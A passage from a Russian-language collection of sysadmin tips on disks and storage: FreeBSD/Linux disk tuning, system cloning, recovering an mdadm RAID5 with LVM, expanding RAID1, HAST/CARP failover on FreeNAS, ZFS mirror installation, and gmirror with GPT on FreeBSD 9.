По умолчанию запись на диски в FreeBSD производится в синхронном режиме, значительно увеличить скорость записи можно активировав асинхронный режим: В /etc/fstab в поле Options добавить async (например rw,async). Или для примонтированного раздела: mount -u -o async /home Для увеличения производительности IDE дисков, в файле конфигурации ядра можно указать для wdc устройств flags 0xa0ffa0ff или 0x80ff80ff (подробнее man wd, man ad). Для ad: sysctl hw.atamodes; sysctl hw.ata Например: sysctl hw.atamodes=pio,pio,---,dma,pio,---,dma,---, См. также man atacontrol Третий вариант - активировать в настройках ядра SOFTUPDATES и запустить tunefs -n enable /usr в single-user на размонтированном разделе.

Как создать рабочий дубликат Linux или FreeBSD системы. [обсудить]

1. Монтируем новый жесткий диск. 2. Создаем разделы на новом диске с помощью fdisk (для freebsd /stand/sysintall или /usr/sbin/sysinstall). Создаем файловую систему. 3. Копируем файлы на новый диск (кроме каталога /mnt, не допускаем рекурсии !!!) find / -xdev | cpio -pdumv /mnt/new - на каждый раздел. или tar cf - /bin /usr /etc д.р.| tar xf - -C /mnt/new или cd /mnt/new; dump -0u -f - /директории| restore -r -f - или cp -Raxv / /mnt/new - на каждый раздел. или pax -r -w -p e / /mnt (говорят копирует гораздо быстрее чем dump/restore) или просто копируем в Midnight Commander'е (не рекомендуется). Лучший способ - dump/restore или rsync, иначе можно потерять расширенные атрибуты и ACL. 4. Редактируем /mnt/new/etc/fstab 5. Создаем с помощью /dev/MAKEDEV недостающие устройства (для нового типа диска). 6. mkdir /mnt/new/proc /mnt/new/mnt 7a. Только для Linux: правка /etc/lilo.conf и запуск lilo -r /mnt/new -b /dev/hdb При возникновении ошибки при загрузке: Было: boot=/dev/sda default=linux-up image=/boot/vmlinuz-up label=linux-up root=/dev/sda2 initrd=/boot/initrd-up.img Предположим, что дубликат размещен на /dev/sdb, тогда меняем boot=/dev/sda на boot=/dev/sdb и добавляем: disk=/dev/sdb bios=0x80 Выполняем lilo -r /mnt/new и не забываем убирать исправления из lilo.conf. 7b. Для freebsd загрузчик устанавливается после разбиения диска на разделы через sysintall. PS. Если диски одинаковые можно использовать dd if=/dev/hda of=/dev/hdb, если разделы одинаковые: dd if=/dev/hda1 of=/dev/hdb1

Как 1 в 1 скопировать файловую систему. [комментарии]

Копируем /usr в текущую директорию: dump -0u -f - /usr | restore -r -f - Для полного бэкапа /usr на ленту: dump -0u -f /dev/st0 /usr

CD-ROM, CD-R, AudioCD:

RAID массивы

Спасение RAID5 в Linux или восстановление mdadm на другой машине Автор: petrov.pash [комментарии]

Сегодня на работе сдох сервер. Без признаков жизни и включения. А на нем важная информация. Не срочная, но важная. Главня проблема в том что нужные файлы были на рэйде (mdadm), да еще и на LVM. Расскажу, как спасал информацию... Отключаю диски, достаю, кладу на стол. Сервер отвожу в ремонт. И начинаю реанимировать диски. А схема там такая - из 3-х 400 гигабайтных дисков собран RAID5 в mdadm, поверх рэйда - LVM, на LVM - файловая система XFS. Подключаю все диски к рабочему компьютеру, пытаюсь загрузиться со своего рабочего диска - не грузится. Некогда разбираться - пробую грузится с live-cd с Ubuntu. Загрузилось! Начинается самое интересное: N.B. - все операции проводились под root, поэтому нужно в консоли сделать sudo su 1) Поскольку диски sata - открываем консоль и смотрим, что нашлось (ненужные строчки пропущены): root@ubuntu:/home/ubuntu# dmesg | grep sd [ 40.566532] sd 2:0:0:0: [sda] 488397168 512-byte hardware sectors (250059 MB) [ 40.592220] sd 2:0:1:0: [sdb] 781422768 512-byte hardware sectors (400088 MB) [ 40.611879] sd 3:0:0:0: [sdc] 781422768 512-byte hardware sectors (400088 MB) [ 40.635162] sd 3:0:1:0: [sdd] 781422768 512-byte hardware sectors (400088 MB) root@ubuntu:/home/ubuntu# ага. есть 4 диска - 1 диск sda-250GB - это рабочий, остальные (sdb,sdc,sdd) - части рэйда. 2) В live-cd Ubuntu нет ни mdadm, ни lvm. Исправим это. Настраиваем сеть, и выполняем в терминале: root@ubuntu:/home/ubuntu# apt-get update && apt-get install mdadm lvm2 Установилось. Хорошо, едем дальше. 3) Пытаемся пересобрать RAID в автоматическом режиме: root@ubuntu:/home/ubuntu# mdadm --assemble --scan mdadm: /dev/md0 has been started with 2 drives (out of 3) and 1 spare. root@ubuntu:/home/ubuntu# cat /proc/mdstat Personalities : [raid6] [raid5] [raid4] md0 : active raid5 sdc1[0] sdd1[1] 781417472 blocks level 5, 64k chunk, algorithm 2 [3/2] [UU_] unused devices: Видим что массив нашелся, но сломанный - один диск отвалился. Игнорируем, потому что рэйд пятого уровня - позволяет сохранить данные при поломке одного диска. Массив нашелся, поднялся. Двигаемся дальше. 4) Поднимаем LVM: Загружаем модуль root@ubuntu:/home/ubuntu# modprobe dm-mod Активируем LVM: root@ubuntu:/home/ubuntu# vgchange -a y 1 logical volume(s) in volume group "files" now active Проверяем какие logical volumes у нас есть: root@ubuntu:/home/ubuntu# lvscan ACTIVE '/dev/files/filesrv' [700,00 GB] inherit видим один раздел - /dev/files/filesrv на 700 гигов. Создаем точку монтирования и монтируем раздел: root@ubuntu:/home/ubuntu# mkdir /files root@ubuntu:/home/ubuntu# mount /dev/files/filesrv /files Смотрим что получилось: root@ubuntu:/home/ubuntu# ls -lh /files/ total 20K drwxrwxrwx 79 root root 8,0K 2009-03-30 06:24 other drwxrwxrwx 15 root root 4,0K 2008-12-08 05:55 public drwxrwxrwt 7 1000 1000 76 2009-04-02 10:33 vmdata drwxrwxrwx 5 1000 1000 47 2009-02-20 10:22 webfiles Ура! Все файлы видны и доступны! Теперь можно скопировать их на рабочий диск: root@ubuntu:/home/ubuntu# mkdir /workhdd root@ubuntu:/home/ubuntu# mount /dev/sda4 /workhdd root@ubuntu:/home/ubuntu# cp -r /files/vmdata /workhdd/ или через ssh на другой сервер: root@ubuntu:/home/ubuntu# scp -r /files/vmdata root@192.168.1.6:/files/ После того как все скопировалось - можно заняться восстановлением RAID. Проверяем еще раз статус: root@ubuntu:/home/ubuntu# cp -r /files/vmdata/ root@ubuntu:/home/ubuntu# cat /proc/mdstat Personalities : [raid6] [raid5] [raid4] md0 : active raid5 sdc1[0] sdd1[1] 781417472 blocks level 5, 64k chunk, algorithm 2 [3/2] [UU_] unused devices: видим что в RAID сейчас два диска - sdc и sdd. Недостающий диск - sdb. Добавим его: root@ubuntu:/home/ubuntu# mdadm /dev/md0 --re-add /dev/sdb1 mdadm: re-added /dev/sdb1 Диск добавился. Следим за его пересборкой: root@ubuntu:/home/ubuntu# cat /proc/mdstat Personalities : [raid6] [raid5] [raid4] md0 : active raid5 sdb1[3] sdc1[0] sdd1[1] 781417472 blocks level 5, 64k chunk, algorithm 2 [3/2] [UU_] [>....................] recovery = 0.0% (95748/390708736) finish=3261.8min speed=1994K/sec Прогрессбар движется, до окончания пересборки осталось 3261 минута, то есть больше 2 суток. Это уже не нормально, да и диск начал слышно стучать. Понятно. Пора ему на свалку. Дополнение: чтобы ребилд быстрее проходил, убираем лимит скорости фонового перестроения: echo 200000 > /proc/sys/dev/raid/speed_limit_min echo 200000 > /proc/sys/dev/raid/speed_limit_max 200000 - это пропускная спосбность в Кб, по умолчанию speed_limit_min = 1000

Расширение программного RAID1 в Linux до зеркала из трёх дисков [комментарии]

При добавлении дополнительного диска к RAID1 в mdadm по умолчанию создаётся запасной диск (hot-spare), который будет задействован в случае выхода из строя одного из входящих в массив дисков. Для увеличения производительности чтения данных, вместо hot-spare диска можно добавить полноценный третий диск в RAID1, т.е. все три диска будут заркалированы и операции чтения будут распараллеливаться между ними. Имеем RAID 1 /dev/md121 из двух разделов /dev/sda1 и /dev/sdb1: mdadm --detail /dev/md121 ... Number Major Minor RaidDevice State 0 8 2 0 active sync /dev/sda1 1 8 18 1 active sync /dev/sdb1 Клонируем разделы на третий диск /dev/sdc sfdisk -d /dev/sda| sed 's/sda/sdc/'| sfdisk /dev/sdc Добавляем /dev/sdc1 в массив: mdadm /dev/md121 --add /dev/sdc1 mdadm --detail /dev/md121 ... Number Major Minor RaidDevice State 0 8 2 0 active sync /dev/sda1 1 8 18 1 active sync /dev/sdb1 2 8 34 - spare /dev/sdc1 Чтобы /dev/sdc1 стал полноценным участником массива меняем статус spare на active: mdadm /dev/md121 --grow --raid-devices=3 Через некоторое время, после того как массив перестроится: mdadm --detail /dev/md121 ... Number Major Minor RaidDevice State 0 8 1 0 active sync /dev/sda1 1 8 17 1 active sync /dev/sdb1 2 8 33 2 active sync /dev/sdc1

Создание отказоустойчивого хранилища на базе FreeBSD или FreeNAS с использованием ZFS, HAST и CARP (доп. ссылка 1) [комментарии]

Начиная с FreeBSD 8.1 в состав включена поддержка системы репликации устройств хранения данных HAST (Highly Avalable STorage), позволяющей создавать высоконадежные конфигурации, в которых данные синхронизированы между несколькими узлами. HAST реализован в виде работающего на уровне пользователя демона hastd, использующего стандартный класс GEOM Gate для обработки запросов ввода/вывода. Hastd, обеспечивает синхронную репликацию блочных устройств поверх TCP/IP сетей, независимо от типа накопителя и файловой системы. HAST предусматривает возможность быстрого восстановления после сбоя, причём, при выходе из строя первичного master-узла, его функции могут быть делегированы slave-узлу. После проверки и монтирования UFS раздела или импорта ZFS пула на поврежденном узле, система автоматически синхронизирует внесенные за время восстановления изменения и продолжит работу без потери данных. Для быстрого развёртывания хранилищ удобно использовать дистрибутив FreeNAS. К сожалению в настоящее время FreeNAS не поддерживает HAST из коробки, но так как во FreeNAS используются стандартные компоненты FreeBSD 8.x, ни что не мешает самостоятельно вручную создать и надстроить работу подобных хранилищ. После первой загрузки FreeNAS настроим параметры сетевого доступа и DNS. Первый узел freenas1 будет иметь IP 192.168.137.31, а второй freenas2 - 192.168.137.32. После первичной типовой настройки подключимся к shell. Настройка узла HAST Перемонтируем корневой раздел для обеспечения возможности записи: mount -uw / Создадим массив хранения RAID3 из дисков da1, da2, da3. graid3 label gr0raid3 da1 da2 da3 В итоге будет создано устройство /dev/raid3/gr0raid3 Включим поддержку CARP и активируем демон hastd: cat <<EOF >> /conf/base/etc/rc.conf ifconfig carp0 create ifconfig carp0 vhid 1 pass freenashast 192.168.137.30/24 # enable HAST daemon hastd_enable="YES" EOF Если в директории /boot/kerneldaemon отсутствует модуль if_carp.ko, скопируем его из системы на базе FreeBSD 8.2 или 8.3. Создадим файл конфигурации hast.conf, в котором определим /dev/raid3/gr0raid3 в качестве синхронизируемого между узлами хранилища: cat <<EOF > /conf/base/etc/hast.conf resource freenashast { on freenas1 { local /dev/raid3/gr0raid3 remote freenas2 } on freenas2 { local /dev/raid3/gr0raid3 remote freenas1 } } EOF Копируем hast.conf в директорию /etc и перезагружаем систему: cp /conf/base/etc/hast.conf /etc Создаём хранилище hast: hastctl create freenashast После появления устройства /dev/hast/freenashast назначаем текущему узлу роль первичной системы: hastctl role primary freenashast Создаём zpool в хранилище freenashast zpool create -m /mnt gr0 /dev/hast/freenashast Создаём символическую ссылку на директорию RAID3, чтобы web-интерфейс FreeNAS распознал вручную созданное хранилище: ln -s /dev/hast/freenashast /dev/raid3/gr1raid3 После этого в GUI FreeNAS можно автоматически импортировать раздел gr0 и настроить совместный доступ с использованием штатного web-интерфейса. Настроим демон devd для переключения HAST из режима master в slave и наоборот в зависимости от состояния сетевого линка: cat <<EOF >> /conf/base/etc/devd.conf notify 30 { match "system" "IFNET"; match "subsystem" "carp0"; match "type" "LINK_UP"; action "/usr/local/sbin/carp-hast-switch master"; }; notify 30 { match "system" "IFNET"; match "subsystem" "carp0"; match "type" "LINK_DOWN"; action "/usr/local/sbin/carp-hast-switch slave"; }; EOF Создадим скрипт hast-carp-switch, который будет выполнять переключение режимов: cat <<EOF > /usr/local/sbin/carp-hast-switch #!/bin/sh resources="freenashast" zfspool="gr0" delay=3 log="local0.debug" name="carp-hast" case "$1" in master) logger -p $log -t $name "Switching to primary provider for $resources." # in order to wait for the original primary provider to change role state # otherwise, brain-split may happen sleep $delay for disk in $resources; do # ensure that this storage can be switched while $(pgrep -lf "hastd: $disk \$secondary\$" > /dev/null 2>&1 ); do sleep 1 done # Switch role for each disk hastctl role primary $disk if [ $? -ne 0 ]; then logger -p $log -t $name "Unable to change role to primary for resouce ${disk}." exit 1 fi done # Wait for the /dev/hast/* devices to appear for disk in $resources; do for I in $(jot 60); do [ -c "/dev/hast/${disk}" ] && break sleep 0.5 done if [ ! -c "/dev/hast/${disk}" ] ; then logger -p $log -t $name "GEOM provider /dev/hast/$disk did not appear." exit 1 fi done logger -p $log -t $name "Role for HAST resources switched to primary." logger -p $log -t $name "Importing ZFS pool." zpool import -f $zfspool # restart the enabled services for srv in $(sqlite3 /data/freenas-v1.db "select srv_service from services_services where srv_enable=1" \\ | xargs printf "grep 'bool_.*%s' /etc/rc.conf.local\\n" | sh | awk '{print $2}') do case $srv in winbindd_enable|samba_enable) /etc/local/rc.d/samba restart ;; netatalk_enable) /etc/local/rc.d/netatalk restart ;; proftpd_enable) /etc/local/rc.d/proftpd restart ;; inetd_enable) /etc/rc.d/inetd restart ;; nfs_server_enable) /etc/rc.d/nfsserver restart ;; mountd_enable) /etc/rc.d/mountd restart ;; nfsd_enable) /etc/rc.d/nfsd restart ;; rsyncd_enable) /etc/local/rc.d/rsyncd restart ;; esac done ;; slave) logger -p $log -t $name "Switching to secondary provider for $resources." # stop the running services for srv in $(sqlite3 /data/freenas-v1.db "select srv_service from services_services where srv_enable=1" \\ | xargs printf "grep 'bool_.*%s' /etc/rc.conf.local\\n" | sh | awk '{print $2}') do case $srv in winbindd_enable|samba_enable) /etc/local/rc.d/samba stop ;; netatalk_enable) /etc/local/rc.d/netatalk stop ;; proftpd_enable) /etc/local/rc.d/proftpd stop ;; inetd_enable) /etc/rc.d/inetd stop ;; nfs_server_enable) /etc/rc.d/nfsserver stop ;; mountd_enable) /etc/rc.d/mountd stop ;; nfsd_enable) /etc/rc.d/nfsd stop ;; rsyncd_enable) /etc/local/rc.d/rsyncd stop ;; esac done # export the zfs pool & change role to slave for disk in $resources; do zpool export -f $zfspool sleep $delay hastctl role secondary $disk 2>&1 if [ $? -ne 0 ]; then logger -p $log -t $name "Unable to switch role to secondary for resource $disk." exit 1 fi logger -p $log -t name "Role switched to secondary for resource $disk" done ;; *) logger -p $log -t $name "Usage: $0 " exit 1 ;; esac Поменяем права доступа и перезагрузим систему: chmod +x /usr/local/sbin/carp-hast-switch reboot После перезагрузки вручную установим первичный режим HAST для созданного хранилища: hastctl role primary freenashast Выше представленная инструкция рассчитана на создание master-узла. Для запасного slave-узла, который возьмёт на себя управление в случае сбоя первичного узла, настойка выполняется аналогично, за одним исключением - для интерфейса carp0 должен быть установлен меньший приоритет, чем на master-узле: ifconfig carp0 vhid 1 pass freenashast advskew 100 192.168.137.30/24

Отключаем RAID1 на MB и ставим FreeBSD на zfs mirror на диски c сектором 4k (доп. ссылка 1) Автор: nagual [комментарии]

Согласно рекомендациям Oracle ZFS лучше не ставить поверх RAID, так как это приведет к не оптимальному распределению нагрузки на шпиндели. Так же хочется напомнить о необходимости включении режима ACHI в BIOS. Собственно скрипт: #!/bin/sh mount_cd9660 /dev/cd0 /media DIST="/media/usr/freebsd-dist" DISKDEV1="da1" DISKDEV2="da2" SWAPSIZE="1G" LOGFILE="tmp06_first.log" exec 1>$LOGFILE 2>&1 ZPOOL="zroot" HOSTNAME="BSD" MNT="/mnt2" mkdir -p $MNT sysctl kern.geom.debugflags=0x10 /bin/echo "Starting newfs ZFS " /sbin/gpart create -s gpt $DISKDEV1 /sbin/gpart create -s gpt $DISKDEV2 /bin/sync /sbin/gpart add -a 4k -b 34 -s 64k -t freebsd-boot $DISKDEV1 /sbin/gpart add -a 4k -t freebsd-zfs -l disk0 $DISKDEV1 /bin/sync /sbin/gpart add -a 4k -b 34 -s 64k -t freebsd-boot $DISKDEV2 /sbin/gpart add -a 4k -t freebsd-zfs -l disk1 $DISKDEV2 /bin/sync /sbin/gpart bootcode -b /boot/pmbr -p /boot/gptzfsboot -i 1 $DISKDEV1 /sbin/gpart bootcode -b /boot/pmbr -p /boot/gptzfsboot -i 1 $DISKDEV2 /bin/sync /sbin/gnop create -S 4096 /dev/gpt/disk0 /sbin/gnop create -S 4096 /dev/gpt/disk1 /bin/sync /sbin/zpool create -m $MNT -f -o cachefile=/var/tmp/$ZPOOL.cache $ZPOOL mirror /dev/gpt/disk0.nop /dev/gpt/disk1.nop /sbin/zpool export $ZPOOL /sbin/gnop destroy /dev/gpt/disk0.nop /sbin/gnop destroy /dev/gpt/disk1.nop /sbin/zpool import -o cachefile=/var/tmp/$ZPOOL.cache $ZPOOL /sbin/zpool set bootfs=$ZPOOL $ZPOOL /sbin/zpool list /sbin/zpool status /sbin/zfs get recordsize /usr/sbin/zdb -U /var/tmp/$ZPOOL.cache |grep ashift /sbin/mount /bin/df -H /bin/sync /sbin/zfs set checksum=fletcher4 $ZPOOL /sbin/zfs create -V $SWAPSIZE $ZPOOL/swap /sbin/zfs set org.freebsd:swap=on $ZPOOL/swap /sbin/zfs set checksum=off $ZPOOL/swap /bin/sync /sbin/zfs create -o mountpoint=$MNT/usr $ZPOOL/usr /sbin/zfs create -o mountpoint=$MNT/usr/ports $ZPOOL/usr/ports /sbin/zfs create -o mountpoint=$MNT/usr/src $ZPOOL/usr/src /sbin/zfs create -o mountpoint=$MNT/usr/home $ZPOOL/usr/home /sbin/zfs create -o mountpoint=$MNT/var $ZPOOL/var /sbin/zfs create -o mountpoint=$MNT/var/db $ZPOOL/var/db /sbin/zfs create -o mountpoint=$MNT/var/tmp $ZPOOL/var/tmp /sbin/zfs create -o mountpoint=$MNT/tmp $ZPOOL/tmp /bin/sync chmod 1777 $MNT/tmp $MNT/var/tmp cd $DIST export DESTDIR=$MNT for file in base.txz doc.txz kernel.txz ports.txz src.txz; do (cat $file | tar --unlink -xpJf - -C ${DESTDIR:-/}) ; done cat << EOF >> $MNT/etc/rc.conf #!/bin/sh ipv6_enable="NO" rc_info="YES" # Enables display of informational messages at boot. keymap=ru.koi8-r keychange="61 ^[[K" scrnmap=koi8-r2cp866 font8x16=cp866b-8x16 font8x14=cp866-8x14 font8x8=cp866-8x8 saver="blank" keyrate="fast" mousechar_start="3" moused_enable="YES" moused_port="/dev/psm0" moused_type="auto" network_interfaces="auto" # List of network interfaces (or "auto"). ifconfig_lo0="inet 127.0.0.1 netmask 255.255.255.0" defaultrouter="192.168.0.1" ifconfig_em0="inet 192.168.0.88 netmask 255.255.255.0" hostname=$HOSTNAME zfs_enable="YES" kern_securelevel_enable="NO" linux_enable="YES" sshd_enable="YES" sshd_flags="-u0" usbd_enable="NO" #fsck_y_enable="YES" background_fsck="NO" sendmail_enable="NONE" # Run the sendmail inbound daemon (YES/NO). sendmail_flags="-L sm-mta -bd -q30m" # Flags to sendmail (as a server) sendmail_submit_enable="NO" # Start a localhost-only MTA for mail submission sendmail_submit_flags="-L sm-mta -bd -q30m -ODaemonPortOptions=Addr=localhost" # Flags for localhost-only MTA sendmail_outbound_enable="NO" # Dequeue stuck mail (YES/NO). sendmail_outbound_flags="-L sm-queue -q30m" # Flags to sendmail (outbound only) sendmail_msp_queue_enable="NO" # Dequeue stuck clientmqueue mail (YES/NO). sendmail_msp_queue_flags="-L sm-msp-queue -Ac -q30m" # Flags for sendmail_msp_queue daemon. # to their chrooted counterparts. nfs_reserved_port_only="NO" ntpdate_flags="ntp.ucsd.edu" ntpdate_enable="NO" xntpd_enable="NO" net_snmpd_enable="NO" inetd_enable="NO" inetd_program="/usr/sbin/inetd" # path to inetd, if you want a different one. inetd_flags="-wW -C 60" # Optional flags to inetd portmap_enable="NO" nfs_server_enable="NO" nfs_client_enable="NO" tcp_drop_synfin="YES" icmp_drop_redirect="YES" icmp_log_redirect="NO" syslogd_enable="YES" syslogd_flags="-ss" accounting_enable="NO" check_quotas="NO" clear_tmp_enable="YES" # Clear /tmp at startup. cron_enable="YES" # Run the periodic job daemon. named_enable="YES" # Run named, the DNS server (or NO). #devd_enable="YES". #devfs_system_ruleset="devfsrules_common". ldconfig_paths="/usr/lib/compat /usr/local/lib /usr/local/kde4/lib /usr/local/lib/compat/pkg" # Denyhosts Startup. denyhosts_enable="YES" EOF cat << EOF >> $MNT/etc/fstab # Device Mountpoint FStype Options Dump Pass# #linproc /compat/linux/proc linprocfs rw 0 0 EOF cat << EOF >> $MNT/etc/resolv.conf search $HOSTNAME domain $HOSTNAME nameserver 127.0.0.1 #nameserver 8.8.8.8 EOF cat << EOF >> $MNT/boot/loader.conf zfs_load="YES" vfs.root.mountfrom="zfs:$ZPOOL" autoboot_delay="1" beastie_disable="YES" linux_load="YES" # Linux emulation #lindev_load="NO" # Linux-specific pseudo devices (see lindev(4)) linprocfs_load="YES" # Linux compatibility process filesystem linsysfs_load="YES" # Linux compatibility system filesystem #ipfw_load="YES" # Firewall #ipfw_nat_load="YES" #if_tap_load="YES" # Ethernet tunnel software network interface # Kernel Options kern.ipc.shmseg=1024 kern.ipc.shmmni=1024 kern.maxproc=10000 vm.pmap.pg_ps_enabled="0" #hw.mca.enabled=1 kern.timecounter.hardware=i8254 hw.pci.enable_msix=0 hw.pci.enable_msi=0 net.inet.tcp.tso=0 EOF cp /var/tmp/$ZPOOL.cache $MNT/boot/zfs/zpool.cache zpool set cachefile=$MNT/boot/zfs/zpool.cache $ZPOOL /bin/sync /sbin/zfs unmount -a /bin/sync /sbin/zfs set mountpoint=legacy $ZPOOL /sbin/zfs set mountpoint=/tmp $ZPOOL/tmp /sbin/zfs set mountpoint=/usr $ZPOOL/usr /sbin/zfs set mountpoint=/usr/ports $ZPOOL/usr/ports /sbin/zfs set mountpoint=/usr/src $ZPOOL/usr/src /sbin/zfs set mountpoint=/usr/home $ZPOOL/usr/home /sbin/zfs set mountpoint=/var $ZPOOL/var /sbin/zfs set mountpoint=/var/db $ZPOOL/var/db /sbin/zfs set mountpoint=/var/tmp $ZPOOL/var/tmp /bin/sync rm $MNT exit 0 Работу проверял под vmware. Своп сделан на zfs дабы не воротить еще и gmirror. Не забудьте размер свопа увеличить.

Использование ZFS в Ubuntu Linux (доп. ссылка 1) [комментарии]

Установим поддержку ZFS на Ubuntu Server и создадим RAIDZ-хранилище на базе двух имеющихся жестких дисков. Создадим на дисках по разделу при помощи утилиты cfdisk, для просмотра таблицы разделов можно использовать команду "cat /proc/partitions". Установим пакеты, необходимые для обеспечения работы ZFS: sudo apt-get update && sudo apt-get upgrade sudo apt-get install python-software-properties bison flex build-essential \\ libelf-dev zlib1g-dev libc6-dev-i386 libdwarf-dev binutils-dev Подключим дополнительный PPA-репозиторий zfs-native: sudo add-apt-repository ppa:zfs-native/stable и установим из него пакеты с компонентами для поддержки ZFS: sudo apt-get update sudo apt-get install ubuntu-zfs Создадим zpool с именем zfs-test и типом заркалирования RAIDZ, поместив в создаваемый RAID разделы на двух имеющихся дисках: sudo zpool create zfs-test raidz /dev/sdb1 /dev/sdc1 Посмотрим статус созданного раздела: sudo zpool status sudo zfs list df -h

Настройка gmirror при использовании GPT во FreeBSD 9 Автор: Mikhail Zakharov [комментарии]

С релизом FreeBSD-9.0, GPT-формат разделов жестких дисков стал, наконец, делом обыденным, ведь даже новый инсталлятор предполагает использование GPT по-умолчанию. Однако в связи с переходом на GPT-разметку дисков возникают и сложности, поскольку очень многое, в том числе и документация, продолжает быть завязано на ныне устаревший механизм MBR-разделов или слайсов. Так, например, к своему огорчению я обнаружил, что большинство разделов Handbook'а посвященных дискам, GEOM-классам и файловым системам изобилуют примерами работ со старыми слайсами, а не используют для этой цели новый формат GPT. Более того, в январе 2012 года, в разделе учебника, посвященного использованию gmirror, я внезапно наткнулся на предостережение, которое прямо указывает на невозможность сочетания FreeBSD-9.x, gmirror и GPT-разметки дисков: Warning: Creating a mirror out of the boot drive may result in data loss if any data has been stored on the last sector of the disk. This risk is reduced if creating the mirror is done promptly after a fresh install of FreeBSD. The following procedure is also incompatible with the default installation settings of FreeBSD 9.X which use the new GPT partition scheme. GEOM will overwrite GPT metadata, causing data loss and possibly an unbootable system. Примечательно, что в русскоязычном варианте Handbook'а часть этого предупреждения относительно использования GPT-разделов вместе с gmirror во FreeBSD-9.x попросту отсутствует. Терзаемый неприятным чувством, что поддержка GPT дисков во FreeBSD далека еще от совершенства, я решил выяснить, действительно-ли в настоящий момент дисковая функциональность FreeBSD-9.0R не может объединить технологии gmirror - программного зеркала (RAID-1) и разделов GPT. Чаще всего gmirror используется в двух вариантах. Первый, это формирование зеркала из "сырых" дисков, с последующим созданием на зеркале разделов и файловых систем. Договоримся для краткости называть его gmirror+GPT. Второй способ предполагает создание одного, или нескольких разделов на диске и последующее зеркалирование этих разделов на другой диск. Этот метод будем называть GPT+gmirror. gmirror+GPT Итак, чтобы при помощи gmirror собрать RAID-1, а затем создать поверх него разделы GPT нам потребуется дистрибутив FreeBSD-9.0R и два установленных в компьютер жестких диска. Рекомендуется, чтобы оба жестких диска были одинаковыми по всем характеристикам: объему, скорости вращения шпинделей, размеру буфера памяти и т.д. И хоть эти условия для применения gmirror не являются обязательными, однако нужно понимать, что в случае использования различия дисков, характеристики зеркала будут определяться худшим диском. К сожалению, в настоящий момент инсталлятор FreeBSD не умеет управлять модулем gmirror, поэтому создавать RAID-1 нам придется своими собственными руками. Для этого загружаемся с инсталляционного диска но, запуская установку, переходим в shell, сразу, как только инсталлятор предоставит нам эту возможность: Попав в командную строку, начинаем подготовку зеркала. Бегло проглядев вывод команды dmesg, обнаруживаем, что в связи с новым именованием устройств во FreeBSD-9.0, в нашем случае диски определились как ada0 и ada1. Ну, раз так, значит так, создадим из них зеркало gm0 и сразу же загрузим его: # gmirror label gm0 ada0 ada1 # gmirror load Теперь в системе появился новый диск - gm0. Убедиться в этом можно посмотрев вывод команды: # ls -la /dev/mirror/gm0 Однако этот диск пока сырой. Поэтому определим для него схему разбиения на разделы, в нашем случае - GPT и сделаем этот диск загрузочным: # gpart create -s gpt mirror/gm0 # gpart bootcode -b /boot/pmbr -p /boot/gptboot -i 1 mirror/gm0 На этом первая часть вмешательства в обычный ход инсталляции FreeBSD может быть закончена. В самом деле, зачем людям работать руками, если инсталлятор со всем остальным может справиться самостоятельно? Поэтому смело набираем exit и выходим из shell'а, чтобы вернуться в инсталлятор, где нам будет предложено установить имя хоста и выбрать компоненты дистрибутива. Далее, когда инсталлятор загрузит редактор разделов, наше программное зеркало будет ему доступно также, как и два физических диска ada0 и ada1. Теперь после нашего краткого вмешательства, инсталлятор беспрепятственно позволит создать на зеркале необходимые разделы. Более того все изменения будут даже динамически отражаться на обеих половинах зеркала: Далее инсталляция пойдет как по маслу в обычном порядке и до своего логического завершения. Когда все закончится, перезагружаемся проверить все-ли мы сделали правильно, но здесь нас поджидает небольшой fail. С прискорбием мы обнаруживаем, что система загрузиться не может: ядро попросту не понимает, что такое gmirror и не видит зеркала. Выругавшись нехорошими словами, снова вставляем инсталляционный диск и загружаемся в так полюбившийся нам shell. Далее загружаем модуль gmirror и, вспомнив, что корневая файловая система находится на gm0p3, монтируем корень в /mnt. # gmirror load # mount /dev/mirror/gm0p3 /mnt Теперь остается добавить модуль gmirror в loader.conf для загрузки его вместе с ядром при старте системы: # echo ‘geom_mirror_load="YES"’ > /mnt/boot/loader.conf На этом действительно все. Перезагружаемся и получаем работоспособную систему. Чтобы убедиться в этом, можно безбоязненно проводить тесты по поочередному отключению дисков. Единственный нюанс, внимательный администратор заметит во время загрузки системы настораживающее предупреждение: gptboot: invalid backup GPT header Andrey V. Elsukov - один из разработчиков FreeBSD объясняет это предупреждение так: "Причина понятна - GPT была создана поверх зеркала. Размер провайдера mirror/gm0 на 1 сектор меньше, чем размер диска, так как gmirror забирает последний сектор для хранения своих метаданных. Загрузчик gptboot ничего не знает о программном зеркале и ищет резервный заголовок GPT в конце диска, а там находятся метаданные gmirror. Тут есть небольшое разногласие между gptboot и GEOM_PART_GPT. Некоторое время назад я изменил алгоритм проверки корректности GPT в GEOM_PART_GPT. А именно, после прочтения основного заголовка GPT и проверки его контрольной суммы, резервный заголовок считывается по хранящемуся в основном заголовке адресу. В случае, когда основной заголовок повреждён, резервный заголовок ищется в конце диска." Как видим из объяснения разработчика, ничего вроде бы страшного не происходит. И хотя у нас отсутствует запасной заголовок GPT в конце диска, это не критично, правда до тех пор, пока все работает. GPT+gmirror Этот вариант отличает от предыдущего тем, что зеркалируетяс не диск целиком, а отдельные его разделы. Как и для первого случая, нам потребуется дистрибутив FreeBSD-9.0R и два жестких диска, установленных в машину. Как и прежде рекомендуется, чтобы диски были полностью одинаковыми. Тем не менее, если случилось так, что один диск больше другого, то инсталляцию FreeBSD лучше проводить на диск меньшего объема. Это поможет избежать лишних расчетов размеров разделов при зеркалировании их с большего диска на меньший. В остальном первоначальная установка FreeBSD-9.0R ничем не отличается от обычной инсталляции по-умолчанию. Вся настройка зеркалирования начинается, в тот момент, когда мы загружаем свежепроинсталлированную систему и попадаем в консоль. Как и в предыдущем случае, диски определились как ada0 и ada1. FreeBSD установлена на меньший по размеру диск - ada0. Первым делом сохраним разметку диска и восстановим её на другом диске: # gpart backup ada0 > ada0.gpt # gpart restore -F /dev/ada1 < ada0.gpt # gpart show Как видно на скриншоте, разделы удачно скопировались и на бОльшем диске осталось 5GB свободного неразмеченного места. Теперь по логике вещей, можно начать зеркалирование разделов. Однако нужно забыть сделать диск ada1 загрузочным, ведь мы зеркалируем не весь диск целиком, а только его разделы. Иначе с выходом из строя ada0, система не сможет загрузится с ada1. Поэтому: # gpart bootcode -b /boot/pmbr -p /boot/gptboot -i 1 ada1 Кроме того, раздел /dev/da0p3 - содержит корневую файловую систему, он смонтирован, и размонтировать его не получится, поэтому в текущем положении изменить его не возможно. Поэтому перезагружаем систему и загружаемся с инсталляционного диска, где привычно уже заходим в shell и на каждом разделе диска ada0 создаем зеркало и загружаем его: # gmirror label -vb round-robin boot /dev/ada0p1 # gmirror label -vb 